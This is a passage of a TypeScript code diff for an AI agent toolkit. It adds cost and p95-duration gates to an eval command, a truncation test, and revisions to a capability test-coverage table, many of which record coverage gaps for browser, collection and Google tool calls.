+      permissionCategoryFor("finish_step")
+    );
+  });
+
+  it("classes an unknown name external", () => {
+    expect(
+      capabilityFromTool(new NamedTool("no_such_tool_anywhere")).spec.category
+    ).toBe("external");
+  });
+});
+
+// Keep the type import used so the file compiles under isolatedModules.
+void ({} as ProcessingContext);

--- a/packages/agents/tests/tool-result-truncation.test.ts
+++ b/packages/agents/tests/tool-result-truncation.test.ts
@@ -26,6 +26,12 @@ describe("truncateToolResult", () => {
     expect(out).toContain("truncated");
   });
 
+  it("takes a caller's advice in place of the retrieval advice", () => {
+    const out = truncateToolResult("z".repeat(100), 10, "Return less.");
+    expect(out).toContain("Return less.");
+    expect(out).not.toContain("Narrow the query");
+  });
+
   it("respects a custom cap", () => {
     const out = truncateToolResult("z".repeat(100), 10);
     expect(out.startsWith("z".repeat(10))).toBe(true);

--- a/packages/cli/src/commands/eval.ts
+++ b/packages/cli/src/commands/eval.ts
@@ -44,6 +44,10 @@ interface EvalCliOptions {
   systemPrompt?: string;
   /** commander negated flag: `--no-agent-prompt` sets this to false. */
   agentPrompt?: boolean;
+  /** Exit non-zero when the run's total provider spend (USD) exceeds this. */
+  maxCostUsd?: string;
+  /** Exit non-zero when the p95 case duration (ms) exceeds this. */
+  maxP95DurationMs?: string;
 }
 
 /** Metadata for one eval case, shown by `--list`. */
@@ -99,9 +103,15 @@ interface EvalRunDeps {
  * paths, which otherwise only a paid model run reaches — are unit-testable.
  */
 export function evalGateFailures(
-  result: Pick<EvalRunResult, "successRate" | "meanScore" | "casesRan">,
+  result: Pick<
+    EvalRunResult,
+    "successRate" | "meanScore" | "casesRan" | "costUsd" | "durationsMs"
+  >,
   suiteId: string,
-  opts: Pick<EvalCliOptions, "minScore" | "minSuccess" | "minCases">
+  opts: Pick<
+    EvalCliOptions,
+    "minScore" | "minSuccess" | "minCases" | "maxCostUsd" | "maxP95DurationMs"
+  >
 ): string[] {
   const failures: string[] = [];
 
@@ -148,7 +158,67 @@ export function evalGateFailures(
     }
   }
 
+  // Spend is summed over every case, skipped ones included (they cost 0), so
+  // the number gated is what the run billed.
+  if (opts.maxCostUsd !== undefined) {
+    const cap = parseNumericOption(opts.maxCostUsd, "--max-cost-usd", {
+      min: 0
+    });
+    if (result.costUsd > cap) {
+      failures.push(
+        `Total cost $${result.costUsd.toFixed(4)} above --max-cost-usd ${cap}`
+      );
+    }
+  }
+
+  // p95 over the cases that ran: a skipped case records 0 ms and would pull
+  // the percentile down. Nearest-rank, so the number is a duration one case
+  // actually took. A run with no timings fails the gate outright — the same
+  // rule --min-score applies when a suite reports no score.
+  if (opts.maxP95DurationMs !== undefined) {
+    const cap = parseNumericOption(
+      opts.maxP95DurationMs,
+      "--max-p95-duration-ms",
+      { integer: true, min: 0 }
+    );
+    const p95 = percentile95(result.durationsMs);
+    if (p95 === undefined) {
+      failures.push(
+        `--max-p95-duration-ms: suite "${suiteId}" ran no case, nothing to time`
+      );
+    } else if (p95 > cap) {
+      failures.push(
+        `p95 case duration ${p95}ms above --max-p95-duration-ms ${cap}`
+      );
+    }
+  }
+
   return failures;
+}
+
+/** Nearest-rank p95; undefined over an empty sample. */
+function percentile95(samples: readonly number[]): number | undefined {
+  if (samples.length === 0) return undefined;
+  const sorted = [...samples].sort((a, b) => a - b);
+  return sorted[Math.ceil(0.95 * sorted.length) - 1];
+}
+
+/**
+ * What every suite records per case and the cost/duration gates read. A
+ * skipped case (`skipped` set, or a non-empty reason string) cost nothing and
+ * took no time, so it stays in the sum and leaves the timings.
+ */
+function runMetrics(
+  cases: readonly {
+    costUsd: number;
+    durationMs: number;
+    skipped?: boolean | string;
+  }[]
+): Pick<EvalRunResult, "costUsd" | "durationsMs"> {
+  return {
+    costUsd: cases.reduce((sum, c) => sum + c.costUsd, 0),
+    durationsMs: cases.filter((c) => !c.skipped).map((c) => c.durationMs)
+  };
 }
 
 /** Outcome of a suite run, consumed by the shared runner. */
@@ -172,6 +242,10 @@ interface EvalRunResult {
    * over whatever survived.
    */
   casesRan: number;
+  /** Provider spend over the whole run, for `--max-cost-usd`. */
+  costUsd: number;
+  /** Wall clock per case that ran, for `--max-p95-duration-ms`. */
+  durationsMs: readonly number[];
 }
 
 /**
@@ -254,6 +328,7 @@ const graphPlannerSuite: EvalSuite = {
 
     return {
       report,
+      ...runMetrics(report.cases),
       formatted: formatEvalReport(report),
       successRate: report.summary.successRate,
       meanScore: report.summary.meanScore,
@@ -319,6 +394,7 @@ const graphE2eSuite: EvalSuite = {
 
     return {
       report,
+      ...runMetrics(report.cases),
       formatted: formatGraphE2eReport(report),
       successRate: report.summary.successRate,
       casesRan: report.summary.total - report.summary.skipped
@@ -362,6 +438,7 @@ const codeGenSuite: EvalSuite = {
 
     return {
       report,
+      ...runMetrics(report.cases),
       formatted: formatCodeGenReport(report),
       successRate: report.summary.postRepairRate,
       // The suite skips nothing: every case is a Code body the planner writes.
@@ -407,6 +484,7 @@ const subtaskSuite: EvalSuite = {
 
     return {
       report,
+      ...runMetrics(report.cases),
       formatted: formatSubtaskReport(report),
       successRate: report.summary.successRate,
       casesRan: report.summary.total - report.summary.skipped
@@ -465,6 +543,7 @@ const codeActSuite: EvalSuite = {
 
     return {
       report,
+      ...runMetrics(report.cases),
       formatted: formatCodeActReport(report),
       successRate: report.summary.successRate,
       meanScore: report.summary.meanScore,
@@ -510,6 +589,7 @@ const taskPlannerSuite: EvalSuite = {
 
     return {
       report,
+      ...runMetrics(report.cases),
       formatted: formatTaskPlanReport(report),
       successRate: report.summary.successRate,
       meanScore: report.summary.meanScore,
@@ -605,6 +685,7 @@ const appBuildSuite: EvalSuite = {
 
     return {
       report,
+      ...runMetrics(report.cases),
       formatted: formatAppBuildReport(report),
       successRate: report.summary.greenWithinBudgetRate,
       meanScore: report.summary.meanScore,
@@ -672,6 +753,7 @@ function makeToolLoopSuite<TFinal>(
 
       return {
         report,
+        ...runMetrics(report.cases),
         formatted: formatToolLoopReport(report),
         successRate: report.summary.successRate,
         meanScore: report.summary.meanScore,
@@ -986,6 +1068,14 @@ export function registerEvalCommand(program: Command): void {
       .option(
         "--no-agent-prompt",
         "Plan with no caller preamble — scores the bare planner contract"
+      )
+      .option(
+        "--max-cost-usd <usd>",
+        "Exit non-zero when the run's total provider spend exceeds this"
+      )
+      .option(
+        "--max-p95-duration-ms <ms>",
+        "Exit non-zero when the p95 case duration (skipped cases excluded) exceeds this"
       )
       .action((opts: EvalCliOptions) => runSuite(suite, opts));
   }

--- a/packages/cli/src/harness/capability-table.ts
+++ b/packages/cli/src/harness/capability-table.ts
@@ -23,8 +23,8 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "21550fd305ce",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/nodetool-api-workflows.test.ts",
       "packages/agents/tests/capabilities-dispatcher.test.ts",
+      "packages/agents/tests/mcp-tools.test.ts",
     ],
     evals: [
       {
@@ -40,8 +40,8 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "500f60f725d0",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-args.test.ts",
       "packages/agents/tests/capabilities-dispatcher.test.ts",
+      "packages/agents/tests/mcp-tools.test.ts",
     ],
   },
   {
@@ -51,8 +51,8 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "efc501df79a2",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-adapters.test.ts",
       "packages/agents/tests/capabilities-dispatcher.test.ts",
+      "packages/agents/tests/mcp-tools.test.ts",
     ],
   },
   {
@@ -143,7 +143,7 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/nodetool-api-workflows.test.ts",
-      "packages/agents/tests/capabilities-gate-parity.test.ts",
+      "packages/agents/tests/mcp-tools.test.ts",
     ],
     evals: [
       {
@@ -169,7 +169,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "42abfc3a3312",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/nodetool-api-workflows.test.ts",
       "packages/agents/tests/mcp-tools.test.ts",
     ],
     evals: [
@@ -187,7 +186,7 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/nodetool-api-workflows.test.ts",
-      "packages/agents/tests/capability-run-secrets-audit.test.ts",
+      "packages/agents/tests/mcp-tools.test.ts",
     ],
     evals: [
       {
@@ -219,7 +218,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "5f748ba651f3",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/nodetool-api-workflows.test.ts",
       "packages/agents/tests/mcp-tools.test.ts",
     ],
   },
@@ -258,7 +256,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-models.test.ts",
-      "packages/agents/tests/capability-run-secrets-audit.test.ts",
     ],
     evals: [
       {
@@ -316,7 +313,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "e65e3ff23393",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-media.test.ts",
       "packages/agents/tests/capabilities-segment-image.test.ts",
     ],
   },
@@ -360,7 +356,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "b9917297fc35",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-media.test.ts",
       "packages/agents/tests/capabilities-generations.test.ts",
     ],
   },
@@ -389,10 +384,13 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     module: "media",
     impl: "packages/agents/src/capabilities/media.ts",
     contract: "57305485ad36",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-media.test.ts",
-    ],
+    gap:
+      "`media-read-bytes.test.ts` drives it from a chat action by " +
+      "guest import, but the `capability-suites` selfcheck's filter " +
+      "list (packages/cli/src/harness/registry.ts) does not run that " +
+      "file, and a suite named here must be one it runs. Adding " +
+      "`media-read-bytes` to that command and to the sync script's " +
+      "extras would credit it.",
   },
   {
     name: "critique_image",
@@ -402,7 +400,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-media.test.ts",
-      "packages/agents/tests/mcp-tools.test.ts",
     ],
     evals: [
       {
@@ -439,7 +436,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-media.test.ts",
-      "packages/agents/tests/capabilities-timeline-render.test.ts",
     ],
   },
   {
@@ -460,7 +456,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "b4bba48ad634",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-media.test.ts",
       "packages/agents/tests/capabilities-media-ffprobe.test.ts",
     ],
   },
@@ -571,20 +566,22 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     module: "collections",
     impl: "packages/agents/src/capabilities/collections.ts",
     contract: "4fd457fa1ff6",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-collections.test.ts",
-    ],
+    gap:
+      "`capabilities-collections.test.ts` snapshots the module's wire " +
+      "names and builds Tools for the readers and indexers; neither " +
+      "lifecycle call has a case. A case that creates a collection, " +
+      "indexes into it and deletes it would close it.",
   },
   {
     name: "delete_collection",
     module: "collections",
     impl: "packages/agents/src/capabilities/collections.ts",
     contract: "eb59236a182f",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-collections.test.ts",
-    ],
+    gap:
+      "`capabilities-collections.test.ts` snapshots the module's wire " +
+      "names and builds Tools for the readers and indexers; neither " +
+      "lifecycle call has a case. A case that creates a collection, " +
+      "indexes into it and deletes it would close it.",
   },
   {
     name: "get_cost_summary",
@@ -604,7 +601,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-nodes.test.ts",
-      "packages/agents/tests/mcp-tools.test.ts",
     ],
   },
   {
@@ -615,7 +611,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-nodes.test.ts",
-      "packages/agents/tests/mcp-tools.test.ts",
     ],
     evals: [
       {
@@ -632,7 +627,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-nodes.test.ts",
-      "packages/agents/tests/mcp-tools.test.ts",
     ],
   },
   {
@@ -654,7 +648,7 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-jobs.test.ts",
-      "packages/agents/tests/capabilities-timeline-render.test.ts",
+      "packages/agents/tests/mcp-tools.test.ts",
     ],
     evals: [
       {
@@ -787,7 +781,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-assets.test.ts",
-      "packages/agents/tests/mcp-tools.test.ts",
     ],
     evals: [
       {
@@ -836,7 +829,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-assets.test.ts",
-      "packages/agents/tests/capabilities-media.test.ts",
     ],
   },
   {
@@ -846,7 +838,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "8dfc3e1b4b9e",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-assets.test.ts",
       "packages/agents/tests/capabilities-lifecycle.test.ts",
     ],
   },
@@ -875,20 +866,24 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     module: "browser",
     impl: "packages/agents/src/capabilities/browser.ts",
     contract: "9660cd6b5c02",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-browser.test.ts",
-    ],
+    gap:
+      "`capabilities-browser.test.ts` reaches this action only by " +
+      "iterating the module's exports (dispatch by name, category, " +
+      "argument pass-through); no test calls it by name with real " +
+      "arguments. A case that drives it against the recorded page " +
+      "fixture and asserts the action's own result would close it.",
   },
   {
     name: "browser_restart",
     module: "browser",
     impl: "packages/agents/src/capabilities/browser.ts",
     contract: "defb85a11e39",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-browser.test.ts",
-    ],
+    gap:
+      "`capabilities-browser.test.ts` reaches this action only by " +
+      "iterating the module's exports (dispatch by name, category, " +
+      "argument pass-through); no test calls it by name with real " +
+      "arguments. A case that drives it against the recorded page " +
+      "fixture and asserts the action's own result would close it.",
   },
   {
     name: "browser_click",
@@ -915,60 +910,72 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     module: "browser",
     impl: "packages/agents/src/capabilities/browser.ts",
     contract: "1a36915fa601",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-browser.test.ts",
-    ],
+    gap:
+      "`capabilities-browser.test.ts` reaches this action only by " +
+      "iterating the module's exports (dispatch by name, category, " +
+      "argument pass-through); no test calls it by name with real " +
+      "arguments. A case that drives it against the recorded page " +
+      "fixture and asserts the action's own result would close it.",
   },
   {
     name: "browser_press_key",
     module: "browser",
     impl: "packages/agents/src/capabilities/browser.ts",
     contract: "d1b1b2fc95c9",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-browser.test.ts",
-    ],
+    gap:
+      "`capabilities-browser.test.ts` reaches this action only by " +
+      "iterating the module's exports (dispatch by name, category, " +
+      "argument pass-through); no test calls it by name with real " +
+      "arguments. A case that drives it against the recorded page " +
+      "fixture and asserts the action's own result would close it.",
   },
   {
     name: "browser_select_option",
     module: "browser",
     impl: "packages/agents/src/capabilities/browser.ts",
     contract: "73c53d222990",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-browser.test.ts",
-    ],
+    gap:
+      "`capabilities-browser.test.ts` reaches this action only by " +
+      "iterating the module's exports (dispatch by name, category, " +
+      "argument pass-through); no test calls it by name with real " +
+      "arguments. A case that drives it against the recorded page " +
+      "fixture and asserts the action's own result would close it.",
   },
   {
     name: "browser_scroll",
     module: "browser",
     impl: "packages/agents/src/capabilities/browser.ts",
     contract: "e2012b881bd6",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-browser.test.ts",
-    ],
+    gap:
+      "`capabilities-browser.test.ts` reaches this action only by " +
+      "iterating the module's exports (dispatch by name, category, " +
+      "argument pass-through); no test calls it by name with real " +
+      "arguments. A case that drives it against the recorded page " +
+      "fixture and asserts the action's own result would close it.",
   },
   {
     name: "browser_console_exec",
     module: "browser",
     impl: "packages/agents/src/capabilities/browser.ts",
     contract: "7add1995b4bc",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-browser.test.ts",
-    ],
+    gap:
+      "`capabilities-browser.test.ts` reaches this action only by " +
+      "iterating the module's exports (dispatch by name, category, " +
+      "argument pass-through); no test calls it by name with real " +
+      "arguments. A case that drives it against the recorded page " +
+      "fixture and asserts the action's own result would close it.",
   },
   {
     name: "browser_console_view",
     module: "browser",
     impl: "packages/agents/src/capabilities/browser.ts",
     contract: "daf5f59b767f",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-browser.test.ts",
-    ],
+    gap:
+      "`capabilities-browser.test.ts` reaches this action only by " +
+      "iterating the module's exports (dispatch by name, category, " +
+      "argument pass-through); no test calls it by name with real " +
+      "arguments. A case that drives it against the recorded page " +
+      "fixture and asserts the action's own result would close it.",
   },
   {
     name: "browser_capture_media",
@@ -1014,7 +1021,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "8e4f918a4fb5",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-apps.test.ts",
       "packages/agents/tests/capabilities-lifecycle.test.ts",
     ],
   },
@@ -1037,7 +1043,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-apps.test.ts",
-      "packages/agents/tests/mcp-tools.test.ts",
     ],
   },
   {
@@ -1048,7 +1053,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-apps.test.ts",
-      "packages/agents/tests/mcp-tools.test.ts",
     ],
   },
   {
@@ -1058,7 +1062,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     contract: "34f77614fa6d",
     selfcheck: "capability-suites",
     suites: [
-      "packages/agents/tests/capabilities-apps.test.ts",
       "packages/agents/tests/capabilities-lifecycle.test.ts",
     ],
   },
@@ -1309,7 +1312,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-web.test.ts",
-      "packages/agents/tests/capabilities-threads.test.ts",
     ],
     evals: [
       {
@@ -1337,7 +1339,7 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-web.test.ts",
-      "packages/agents/tests/apify-capabilities.test.ts",
+      "packages/agents/tests/browser-tools.test.ts",
     ],
   },
   {
@@ -1370,7 +1372,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-web.test.ts",
-      "packages/agents/tests/capabilities-gate-parity.test.ts",
     ],
   },
   {
@@ -1457,7 +1458,6 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     selfcheck: "capability-suites",
     suites: [
       "packages/agents/tests/capabilities-agents.test.ts",
-      "packages/agents/tests/capabilities-gate-parity.test.ts",
     ],
     evals: [
       {
@@ -1521,200 +1521,240 @@ export const CAPABILITY_COVERAGE: readonly CapabilityCoverageEntry[] = [
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "5eb13fc29956",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_drive_read_file",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "0faf5cd573c3",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_drive_get_file",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "afdc399211bb",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_drive_create_file",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "cd4796152389",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "gmail_search",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "c95cdb216e9c",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "gmail_get_message",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "f05758fd1d38",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "gmail_send_message",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "9bd61587642a",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "gmail_modify_labels",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "3817260faa01",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "gmail_list_labels",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "0e9627c9efcd",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_docs_read",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "26bd47cd6a0f",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_docs_create",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "456bad82acbc",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_docs_append",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "eb73d01f558b",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_sheets_read",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "3a21bbb8c59f",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_sheets_append",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "f0f81493694e",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_sheets_update",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "47e7930f9810",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_sheets_create",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "ba23cc1b88c6",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_calendar_list_calendars",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "151e73884ee0",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_calendar_list_events",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "539122030fbd",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_calendar_create_event",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "7e6f8ec90cbc",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
+      "response through the client would close it.",
   },
   {
     name: "google_calendar_delete_event",
     module: "google",
     impl: "packages/agents/src/capabilities/google.ts",
     contract: "cf6421e03cd2",
-    selfcheck: "capability-suites",
-    suites: [
-      "packages/agents/tests/capabilities-google.test.ts",
-    ],
+    gap:
+      "`capabilities-google.test.ts` reaches this call only by " +
+      "iterating the module's exports through the missing-token path " +
+      "and pinning its category; the call itself needs a live Google " +
+      "token and has no fixture. A case that replays a recorded " +
